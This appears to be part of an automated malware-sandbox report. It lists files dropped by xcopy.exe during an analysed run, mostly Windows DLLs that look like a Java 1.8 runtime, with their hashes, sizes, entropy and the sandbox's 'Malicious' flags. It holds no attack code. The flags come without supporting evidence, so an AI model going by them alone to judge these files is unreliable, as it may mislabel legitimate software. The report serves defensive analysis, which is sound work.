                                                                                                                                                                                                                                  SHA1:CF421A298F485C2A000791E1840EDEDEEA19BAD0
                                                                                                                                                                                                                                  SHA-256:D343529D2A49CBB89D644DEAFCE573B873AB45E0BF57E2D906B2F2A964D7BD9A
                                                                                                                                                                                                                                  SHA-512:A08BDCC2883066A8BDB9336EEC5C7F8593202C367CE75A7D7390ED4C6E0E1DBE80B7AFADEEE78F12AC0386D70AC360AF12BF0FF3285ACDA0425789038951F180
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
                                                                                                                                                                                                                                  Entropy (8bit):6.687731230798941
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ry5NDCWthWVWf9BvVVWQ4SWxnYMdn2KqnajySH2rm:rUEWthWwNunll1H2rm
                                                                                                                                                                                                                                  MD5:FA5327C2A3D284385D8DC3D65935604B
                                                                                                                                                                                                                                  SHA1:A878B7CDF4AD027422E0E2182DAD694ED436E949
                                                                                                                                                                                                                                  SHA-256:704AD27CAB084BE488B5757395AD5129E28F57A7C6680976AF0F096B3D536E66
                                                                                                                                                                                                                                  SHA-512:473FF715F73839B766B5F28555A861D03B009C6B26C225BC104F4AAB4E4EA766803F38000B444D4D433FF9EA68A3F940E66792BAE1826781342F475860973816
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.859998517027933
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pmXI6fHQdufWthWakWf9BvVVWQ4SWHLUKtkqnajOyr39u:p+fZWthWaRNHlqyrI
                                                                                                                                                                                                                                  MD5:CEFAB9071EC289D88BB312816E62CA82
                                                                                                                                                                                                                                  SHA1:BD95BD97332EA21506171924ACDE4F4248A2EE6A
                                                                                                                                                                                                                                  SHA-256:340CED80FBCFCA804925FF680DA1929F68B95959FD7E4D0C9F67322BB5FE2155
                                                                                                                                                                                                                                  SHA-512:03C4B2B155392DC02370994D28B78D18C38CCBB0C594866AE31DB54111F0F18E264E1378ACDE0F2638E19871D7E3DF7CA3365AD63C0DE689C331F6E5B14E3582
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1224832
                                                                                                                                                                                                                                  Entropy (8bit):6.596601401904231
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:JYFJ6mhjurzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AyH5O:SSrxcC4OxJ6HU
                                                                                                                                                                                                                                  MD5:E6C872D5414D5A8F3D0A77462B0E8F6C
                                                                                                                                                                                                                                  SHA1:9398D1185DA36810ECE1D6723877C212069C2D09
                                                                                                                                                                                                                                  SHA-256:3FCF3FA5DB848A25C311285DB04C944D89FE1829DA690E541B24CE8797A26833
                                                                                                                                                                                                                                  SHA-512:DC8943E51A88553B0E24D66368F6A67D0024C519007E657BF1851F3EE222CF4634C552B86AE188F752137F2E165261BDDA87F2727422B555D6554C6A9390F145
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21632
                                                                                                                                                                                                                                  Entropy (8bit):6.75051196599311
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:5SR9y3pMJ9jltZOVseVuZf3sIYi1oGPxh8E9VF0NyWXa:5Sn8M1QbVuZfNYi/PxWEAq
                                                                                                                                                                                                                                  MD5:850467BDAB490EA654FE6EB9138DE546
                                                                                                                                                                                                                                  SHA1:2FAD536F6A157B77C7672B956AD8ED0BEB4B5EC0
                                                                                                                                                                                                                                  SHA-256:DC145E89896CA329058084E5375437F8E8170950B089FD2E2F748A6FEC4EC2A3
                                                                                                                                                                                                                                  SHA-512:9831005B2533D8C20A2892A13590DD89A19523CBD047B573A2EF90E508F0BC4BA9E740FD0C055CC51C0DED62B8F34B6B1B7D5A882429726CB5DD835265B235CB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1423
                                                                                                                                                                                                                                  Entropy (8bit):4.176285626070561
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:N3ZYKm8fuW6psByGJjR0X46kA2SsGFhD+GbpGCOhLRr3n:mOLUskGJjyltsGFV+GbpGCOTr
                                                                                                                                                                                                                                  MD5:B3174769A9E9E654812315468AE9C5FA
                                                                                                                                                                                                                                  SHA1:238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
                                                                                                                                                                                                                                  SHA-256:37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
                                                                                                                                                                                                                                  SHA-512:0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview: -Xmixed mixed mode execution (default). -Xint interpreted mode execution only. -Xbootclasspath:<directories and zip/jar files separated by ;>. set search path for bootstrap classes and resources. -Xbootclasspath/a:<directories and zip/jar files separated by ;>. append to end of bootstrap class path. -Xbootclasspath/p:<directories and zip/jar files separated by ;>. prepend in front of bootstrap class path. -Xnoclassgc disable class garbage collection. -Xincgc enable incremental garbage collection. -Xloggc:<file> log GC status to a file with time stamps. -Xbatch disable background compilation. -Xms<size> set initial Java heap size. -Xmx<size> set maximum Java heap size. -Xss<size> set java thread stack size. -Xprof output cpu profiling data. -Xfuture enable strictest checks, anticipating futur
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13565952
                                                                                                                                                                                                                                  Entropy (8bit):4.972247052793921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:kLVLl7EWrW8x5n9qEjuU+cYa1NWSJ4+57swH/ifQ60:kLVpEWr95n9qEjuU+cYa1NWq4++wf6
                                                                                                                                                                                                                                  MD5:705E60B27CB0A28F22A0BD5294E7EB8A
                                                                                                                                                                                                                                  SHA1:E09AE8DDA5EDB11A6027FC390C7DBA66C5B4E3E1
                                                                                                                                                                                                                                  SHA-256:02A9329C018FFB337BFC9C13793A082BEA27F342EFEE798617AAD65F4106EB8A
                                                                                                                                                                                                                                  SHA-512:BE14FF6A4A0662C1582E378DE4D7F44B497B7F442C9541F83A8FC3767207EB2C9A7E249531DBB28287F3BA78BD3AF280A5A7425BC670A2CFE917E5B51BF05651
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:......................f%..........Y..................E........[.....(.^.................j............ .,............................................................yD.................................Java HotSpot(TM) Client VM (25.381-b09) for windows-x86 JRE (1.8.0_381-b09), built on Jun 14 2023 13:49:45 by "java_re" with MS VC++ 17.1 (VS2022).ssl/SSLLogger.classPK...........n.V7........../.............*...sun/security/ssl/SSLMasterKeyDerivation$1.cl........@... ...9.0.................C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar;C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar;C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar;C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar;C:\Program Files (x86)\Java\jre-1.8\classes.....C:\Program Files (x86)\Java\jre-1.8\classes.....C:\Program Files (x86)\Java\jre-1.8\lib\meta-index.....D..d....N.................................................
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4099712
                                                                                                                                                                                                                                  Entropy (8bit):6.796115717686572
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:UbvDcxULEeXOEl8MqRxawPNw3O8DWxv7Dcv/G9Htmu:+bcxMzOEl8JRswP6ecoDcv/GRtH
                                                                                                                                                                                                                                  MD5:8040D3E59F2BBC674A9D8C0A8468B660
                                                                                                                                                                                                                                  SHA1:BD46076ECBC18C87629CD6193DF552B3FA986159
                                                                                                                                                                                                                                  SHA-256:0DFBF8F6D8EE5D72222DE01760D5F5B0CF86C36C96B4C679330667FBBEF28C68
                                                                                                                                                                                                                                  SHA-512:2095FFF88E44D55D05FF167B7B92109332495A0C5A2538C177659C44A8D8681146DB64259E86343FE9770DEE82D748ACE31EB4624B50989A9BC2B45719019583
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):151680
                                                                                                                                                                                                                                  Entropy (8bit):7.314572838596142
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:wFWde2kcYRNSyp/npHm49IBcjGojGylYCE2Iu2jGLF5A9bE8LUevFQi8x7:FTkcYR4yp/npHPKCHGgYCE2L1F5A9bEp
                                                                                                                                                                                                                                  MD5:8095AC26DDF238926417CF965CFE5D39
                                                                                                                                                                                                                                  SHA1:E844748F5ED165331BB2DBDF5F92F681A0A8D38E
                                                                                                                                                                                                                                  SHA-256:33393A87E0A099F76868239255A4C74E51526BAE210A024FCA49ED8D4BFB5768
                                                                                                                                                                                                                                  SHA-512:BDE0914C0598393DC445EFB3B5600DD1324040E395BE22B5BFB370BD8D24FC4142C6A0639F2201C7DB4ACF33601FEFF3EFD0E05B85B151567892D77D36743ACD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):68736
                                                                                                                                                                                                                                  Entropy (8bit):6.489854163040045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:dqoQ31OgXqMjSGXsZkSb3OHLnQZ/rbQSTVnB+7o2PxBZ:8oQFOtYSDZkSb3OHbyrMSTVnMEixn
                                                                                                                                                                                                                                  MD5:EBA45B30162DA35F4D167B5D05ED0901
                                                                                                                                                                                                                                  SHA1:12874272AE053CCBCBA4D3543E1816AC5E03D132
                                                                                                                                                                                                                                  SHA-256:94A4E180F3C6E75823B948AE37972DD559F11F5DA4C595EF70C40DEC49EAE988
                                                                                                                                                                                                                                  SHA-512:8897FFCC89EE3E84071B664E8EA86C1D2A159B192F4F9227309A1199BA30D4646423E401C80895F4300726DD96EA40AABBD028AF9D1862ED3D6A8BEC20EDB0F3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):448128
                                                                                                                                                                                                                                  Entropy (8bit):6.419081047643351
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:VudEcOaGfQygV/IU7kbyul8LC4OWLOOrsQ87MOCzJ0QMRtsokszvq+S:s2tFmR
                                                                                                                                                                                                                                  MD5:7CA505884DD1135214835D31FC6D021B
                                                                                                                                                                                                                                  SHA1:768BDFD47ED5EC942042A1B2A7ADF29F6A1A8F19
                                                                                                                                                                                                                                  SHA-256:D28B1D7FAC0A41FAAF2C4BB76E23ADB27B2AF0F857C480DA6BEA9047A2161E85
                                                                                                                                                                                                                                  SHA-512:148EA3DC9503A3940CE4E1C31286B88931F6720C95781D3F473AB7E4D55A427EA57E060EB9CDBD691142554AC3BD10056B82BC68198D4224F88D267129494A2E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31872
                                                                                                                                                                                                                                  Entropy (8bit):6.780442867196149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:h7EnshGpP5U64e3xziyX3uYiecxhvPxWEYn:e/pP5WuiyX+7ecXvPxS
                                                                                                                                                                                                                                  MD5:48DD20D6A83E5E98CC1B98F7B86482C9
                                                                                                                                                                                                                                  SHA1:FEE29706239301D9E57996E2629D8E3BB5781573
                                                                                                                                                                                                                                  SHA-256:6B34A2987603C9BD67F603B34443C44BCB5CCFE6B4BA41C1175208652FDBD833
                                                                                                                                                                                                                                  SHA-512:266BEA9E6F7B5D3224FF8B701AAF470A933098CEC5ACA954B72EC4CFE3374ED8FD148A740FB2A6CC38DA8C7B717C081433073F72F584BCA6C3A712E617015EF4
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28800
                                                                                                                                                                                                                                  Entropy (8bit):6.7414019314723586
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:v6xUIldHFlHx8jmuAq/Yu/BgKfRYihejPxWEih:vMUIfFtxUHJgKfR7cjPxo
                                                                                                                                                                                                                                  MD5:8D3351F4BBA2FFA6D6CE3F94F4549750
                                                                                                                                                                                                                                  SHA1:6470A1C8A514093C6F12801A55C40A3E320B170B
                                                                                                                                                                                                                                  SHA-256:906CAD967F82C14D46E36C441CAB46FA19896C04122BF568574829F563D54BB7
                                                                                                                                                                                                                                  SHA-512:32569EB88E839D3F10043E8816753C86665B970F93CE82EB969FDEDEE136FB173DAA9E1A40BBA4508BA6577597192496BC24EBA88EAEB89CAA09BF3BB71DC87C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1080960
                                                                                                                                                                                                                                  Entropy (8bit):5.85029502348387
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:KwCzp5npcMqPS+jMxA8OTnmXXBqVoEyJl3GbWa8tfvChbOso6C6QJ1eOBwy8euCz:rCzpXcMvqmHcV3Gl3RBtwyv5tT
                                                                                                                                                                                                                                  MD5:AC5FD2FB7A6CA9B92E6CF1CABC9B2E02
                                                                                                                                                                                                                                  SHA1:9364252AC5167273DF51D1BF4218747114DEDEAF
                                                                                                                                                                                                                                  SHA-256:50C5BD67A4A8690184433EADFEEF8311B401B0E94F0FC616DA0BDE320DFF3D57
                                                                                                                                                                                                                                  SHA-512:A5BCD3C3C8C7C2151B18DB7ECF2DE7B6BF2262844BEA77F456DEAC1B974EF268DD489F82BEF4BCFBEACD72B185E365E2D38AF8460C94226A7AA8EEB2D083D97D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1493120
                                                                                                                                                                                                                                  Entropy (8bit):6.160320483646551
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:ikJg/tKH74fS7bZNG06TAk2kfo05C1zsMCbOEWHB:iBEH74fSrbAfowtMCbOEWHB
                                                                                                                                                                                                                                  MD5:86AF77179B260F4880D95F0E28C5733F
                                                                                                                                                                                                                                  SHA1:927353D6837C9F9103EF640B966CC916F9E19C5F
                                                                                                                                                                                                                                  SHA-256:799F697575FDA9979A97211A7C61703C324ABCB3F09E1DDC4C7818299EF3F970
                                                                                                                                                                                                                                  SHA-512:680C3B2614CB6E22891661CB5B0FE1DD8388AEE3E537DCD3E7EBDBF8F46E69246A0E2B38AC6654434491D9CEA52EA8844F2DC1CB6BD285C753E1104B1F665397
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):138368
                                                                                                                                                                                                                                  Entropy (8bit):5.894743027883434
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:fq5Elgc7hOkcQbvXK2h8qdF5fwPdvBMI0DxI:fqu4kVvX3L5fSvxL
                                                                                                                                                                                                                                  MD5:E6B2BC78E9A937BD56A1D9FC7113FCEB
                                                                                                                                                                                                                                  SHA1:3726A1384908EFE489D9C8582A4C657CED26B553
                                                                                                                                                                                                                                  SHA-256:6B73FCEF2D0F5A12FEB16D9B2B0BAC4355EE35C2F5E2FB5454C026E5D341ADBB
                                                                                                                                                                                                                                  SHA-512:7D0D70936AE7C5E9D6DA42599DC9EFE1D8F84B8D425AFE3D31FD923CFCD4450999612983EE69726812AB159FF93499EC569BF723EB73C2405BF385737F83DC85
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265344
                                                                                                                                                                                                                                  Entropy (8bit):6.443196283181112
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:6Tl2xzMTebq2w3MvwF69uTFGMReiDfbadpcx:8lMzMcqV3MY8u5GSl
                                                                                                                                                                                                                                  MD5:1353C1CA88A273B99713B155C5F03F89
                                                                                                                                                                                                                                  SHA1:0BC6D1C254DEBDEFAC33350FEBF275172B25BE6E
                                                                                                                                                                                                                                  SHA-256:5A4729DA6B8566B1E0952365AD13A9438A6534768C908385F7555286BD8312AD
                                                                                                                                                                                                                                  SHA-512:0CB7CBC48CBB320635250DCC202C5F43EDF387806C3A9ADD2347FA49BA80C3AC237845706B3E5E455A16A2CE19E707EC53134CC66C36646E50E99C569688CCA6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):157824
                                                                                                                                                                                                                                  Entropy (8bit):6.567263460152571
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:HsJGyikbPMJKekaKPDY/lOmH5PndghC6ls47Qzl14VGyILm64Udud7sMxy:Hn44KP6OmZvdghblslzlqVvt6+C
                                                                                                                                                                                                                                  MD5:60D2CE6231CDF97A241B0DADB99549DA
                                                                                                                                                                                                                                  SHA1:30338C28C038B15207E4FF16BBAC84D24016D655
                                                                                                                                                                                                                                  SHA-256:176C8BD46338D63B3C01CACFDF797A70A44DB1E45B4BA5C5D2BFA363AA82C4B4
                                                                                                                                                                                                                                  SHA-512:64832BB79D61411669F969594F8296403D91CFC339CE8FB9543928D7A4A5B16F48F823602C9CFE72C788DE51C6D093E9F1A4EB8F6C5FED5F11B0B4AC52189A3B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):222336
                                                                                                                                                                                                                                  Entropy (8bit):6.4574232301067545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Ex9kyxMH+1zbuJHWScmcJJLzZfg2Uiu/GHBhdO1sCYEcRAXoqGIMiNx5:k/ziJ23DLJgQu/MTdO1sCYEcRAYqV5
                                                                                                                                                                                                                                  MD5:D4B1B969A5735DB99E3A7C06A48C7C58
                                                                                                                                                                                                                                  SHA1:0D58E4E50BCAF644DABFC2E3F9936A3F2F323B35
                                                                                                                                                                                                                                  SHA-256:56271EF265D0CF490A0B7D806DDE15CB86A10AFCBDD02AF837934AC2B11CEDFE
                                                                                                                                                                                                                                  SHA-512:791C8C7D367DFB547F5C5B76840CDA084BB7DD28FD28AD0096D3E7BD9254A52633B647C69D67868963F2D285C0FF44C2A2343C797E40FF1BE4CF73063B015065
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):566912
                                                                                                                                                                                                                                  Entropy (8bit):6.05832721351326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:rf1GZncp8Juzl6GxZGwviVuedZIpvzbfl+MlIKfnJe:z1GZncpQuzl6MZIYedZIp/d+MThe
                                                                                                                                                                                                                                  MD5:F06243B83E8D847C6770F767F90A02C2
                                                                                                                                                                                                                                  SHA1:71EC045C15915C4AA8D0CF78577BFA5E552E72E3
                                                                                                                                                                                                                                  SHA-256:1348DCB6F16767379EAED02E0ED450FC241AA4870551CE248CB9EA97C5BFDBF5
                                                                                                                                                                                                                                  SHA-512:D174D9C5B8840C881BF2E79FC254EF362B7AFDA3360FB31DDD3E7EAD4F307A2FD9125EF7666012600BEA3511B11C03A4B5CEFD593B2F97E7AB67DA07417BFA3C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):798848
                                                                                                                                                                                                                                  Entropy (8bit):6.726745599127778
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:EfZd7lzyrI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rleMcf3Mw1qaSG:eZd7lJ4oIb4SfHbH0b+ejrld0Cc2u
                                                                                                                                                                                                                                  MD5:CAF55114A85CB71277803D49C3CA665B
                                                                                                                                                                                                                                  SHA1:1E78378EE43CBDDFF8EFBEB6E7087B3079573E6D
                                                                                                                                                                                                                                  SHA-256:26B17462CB6BA119536B86486923709BE21F0CAC5F18EBB5A18124F65CADFA9F
                                                                                                                                                                                                                                  SHA-512:F0FEC092EA41FBECEA03BB73AF0A190ED6A94A5B7B7AA3A6E726D9F2AF005CFF67C74DAABA6ABEF2BA03D179534E9AEFD3384B8C5A3B04A424AD982DB17D0D4F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):139392
                                                                                                                                                                                                                                  Entropy (8bit):6.659472644708503
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:zH5I0FYyjzs9Nr9RnX3o1PcByxzztpnZYmR3uhr26cPD4Bsi+N2kzmxtb:DznZZT1i+G
                                                                                                                                                                                                                                  MD5:D5326D0D393B9B6E799A4DF24C60CAEC
                                                                                                                                                                                                                                  SHA1:85B797C779A1AEFFE22901E7373FF85B00743B9D
                                                                                                                                                                                                                                  SHA-256:4CE5E8DA73B47A735D7A607CBA12FBFF9561A9267682B4F539570FE7F6A41A64
                                                                                                                                                                                                                                  SHA-512:456E68DB2C13F39ECD4FDB19E44357CE6127C5D6832162DCAD8BD0CD666AAC25626A42AFC456933CA7777B6C75729E17F99BE94F79BA3E30215E0739A215A471
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):176256
                                                                                                                                                                                                                                  Entropy (8bit):6.840092230622407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44160
                                                                                                                                                                                                                                  Entropy (8bit):6.720694297813196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.700135798939824
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60544
                                                                                                                                                                                                                                  Entropy (8bit):6.676826050423698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25728
                                                                                                                                                                                                                                  Entropy (8bit):6.7084252487488065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39552
                                                                                                                                                                                                                                  Entropy (8bit):6.657154445904984
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8038311733525605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142464
                                                                                                                                                                                                                                  Entropy (8bit):6.759982404275612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:DssCRbsL4X9K5X+QVEjaQL/FuuTNi9OexsrMf01WOyxf:YsUbaP5X1WNOH9/
                                                                                                                                                                                                                                  MD5:750F1A51C88BE9E2C4D7970D3FBB745F
                                                                                                                                                                                                                                  SHA1:DDCEE672E1AB3425E7937CF145F082E6F26CA5E1
                                                                                                                                                                                                                                  SHA-256:801FF1959ACD44F237043EC50ADD30D6306BC283EC288640CBBFF9CBACC7B19D
